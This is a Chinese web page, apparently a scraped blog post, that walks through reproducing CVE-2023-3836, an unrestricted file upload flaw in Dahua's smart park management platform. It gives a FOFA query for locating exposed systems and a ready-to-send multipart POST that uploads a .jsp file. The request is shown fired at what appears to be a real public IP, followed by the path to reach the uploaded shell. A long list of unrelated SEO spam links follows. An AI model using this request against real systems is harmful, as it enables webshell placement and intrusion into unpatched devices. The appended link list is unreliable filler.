当前位置: 首页 > news >正文

网站建设优化推广教程自助建站申请

news 2025/11/7 0:14:13
网站建设优化推广教程,自助建站申请,wordpress改字体颜色,哪家公司设计网站文章目录 CVE-2023-3836:大华智慧园区综合管理平台任意文件上传漏洞复现0x01 前言0x02 漏洞描述0x03 影响范围0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现 CVE-2023-3836:大华智慧园区综合管理平台任意文件上传漏洞复现 0x01 前言 免责声…

文章目录

  • CVE-2023-3836:大华智慧园区综合管理平台任意文件上传漏洞复现
    • 0x01 前言
    • 0x02 漏洞描述
    • 0x03 影响范围
    • 0x04 漏洞环境
    • 0x05 漏洞复现
      • 1.访问漏洞环境
      • 2.构造POC
      • 3.复现

CVE-2023-3836:大华智慧园区综合管理平台任意文件上传漏洞复现

0x01 前言

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!

0x02 漏洞描述

大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。

在大华智慧园区管理中发现了一个被归类为严重的漏洞,最高可达20230713。此漏洞影响文件 /emap/devicePoint_addImgIco?hasSubsystem=true 的未知代码。对参数上传的操作会导致无限制上传。攻击可以远程发起。该漏洞已向公众披露,并可能被使用。
在这里插入图片描述

0x03 影响范围

大华智慧园区综合管理平台

0x04 漏洞环境

fofa:“/WPMS/asset/lib/gridster/”
在这里插入图片描述

0x05 漏洞复现

1.访问漏洞环境

在这里插入图片描述

2.构造POC

POC (POST)

POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
Host: ip:port
User-Agent: python-requests/2.26.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: Keep-Alive
Content-Length: 228
Content-Type: multipart/form-data; boundary=f3aeb22be281d77542546a2f71e20982--f3aeb22be281d77542546a2f71e20982
Content-Disposition: form-data; name="upload"; filename="***.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary******
--f3aeb22be281d77542546a2f71e20982--

3.复现

POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
Host: 202.96.139.59:9080
User-Agent: python-requests/2.26.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: Keep-Alive
Content-Length: 228
Content-Type: multipart/form-data; boundary=f3aeb22be281d77542546a2f71e20982--f3aeb22be281d77542546a2f71e20982
Content-Disposition: form-data; name="upload"; filename="a.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary123456
--f3aeb22be281d77542546a2f71e20982--

在这里插入图片描述访问上传文件
shell地址链接:

http://127.0.0.1/upload/emap/society_new/ico_res_**********.jsp

注意:ico_res_**********.jsp 替换成上传数据包回显的文件名
在这里插入图片描述

http://www.yayakq.cn/news/961656/

相关文章:

  • 免费空间的个人网站优秀ppt案例欣赏
  • 成都网站建设低价网站不能访问的原因
  • 做企业门户网站百度霸屏推广
  • 适合手机的网站网站后台登录域名
  • 网站建设下载墙绘做网站哪家好
  • 备案需要网站吗海丰建设局网站
  • 重庆网站建设企业农业信息中心网站建设
  • 网站 备案规定静态网站设计心得
  • 备案的网站做跳转不影响备案把鞍山网站制作一般需要多少钱
  • 网站二级域名解析iis安装好了 网站该怎么做
  • 网站开发目的wordpress 获取模板路径
  • 电商 做图 网站更改网站主题
  • 陕西建设厅继续教育网站wordpress源代码如何在本地编辑器
  • 抢购网站建设智慧团建网站pc端
  • 九度互联网站制作效果贵州网站建设公司哪家好
  • 电子商务网站建设的知识点咖啡网站建设的优势
  • 网站语言wordpress传到ftp
  • 吉林市网站建设优化搜狗网页版入口
  • 泉州制作网站设计哪个网站能帮助做路书
  • 同ip下网站企业网站前期建设
  • 郑州市经开区建设局网站网站图标的制作h1优化代码
  • 怎么做一键添加信任网站网上商城什么意思
  • 淮阴区城乡建设管理局网站地方网站域名用全拼
  • 怎么做自己的淘宝网站中山网站制作策划
  • 门户网站收录竞价网站怎么做seo
  • 网店网站建设哪家自适应平台网站模板
  • 南山网站多少钱电商培训机构哪家强
  • 湖州网站做等保费用文山州住房和城乡建设局网站
  • 免费行情软件网站下载安装南通网站制作怎样
  • 新浪网站源代码免费提供网站